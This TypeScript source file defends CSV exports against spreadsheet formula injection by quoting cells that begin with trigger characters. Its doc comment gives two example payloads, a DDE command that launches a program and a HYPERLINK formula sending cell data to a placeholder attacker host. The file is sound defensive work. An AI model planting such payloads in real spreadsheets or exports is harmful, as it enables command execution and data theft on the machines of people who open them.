/**
 * Escape a cell value for safe CSV output.
 *
 * Closes Security Audit Finding H.5 / C.3 (May 13, 2026): formula injection
 * via CSV export. When Excel or LibreOffice opens a CSV, any cell starting
 * with =, +, -, @, tab, or carriage return is interpreted as a formula. An
 * attacker who can plant values in name / text fields could embed
 * `=cmd|'/c calc'!A1` or `=HYPERLINK("http://attacker.tld?d="&A1)` and have
 * it execute when an admin opens the exported report.
 *
 * Standard OWASP mitigation: prefix any cell value starting with one of the
 * trigger characters with a single quote. The single quote tells the
 * spreadsheet to treat the cell as text. It is not visible in the rendered
 * cell.
 *
 * Also handles standard CSV quoting (embedded commas, double quotes, newlines).
 */
export function escapeCsvCell(value: unknown): string {
  if (value === null || value === undefined) return '';

  let str = typeof value === 'string' ? value : String(value);

  if (/^[=+\-@\t\r]/.test(str)) {
    str = "'" + str;
  }

  if (/[,"\n\r]/.test(str)) {
    str = '"' + str.replace(/"/g, '""') + '"';
  }

  return str;
}

export function csvRow(cells: unknown[]): string {
  return cells.map(escapeCsvCell).join(',');
}
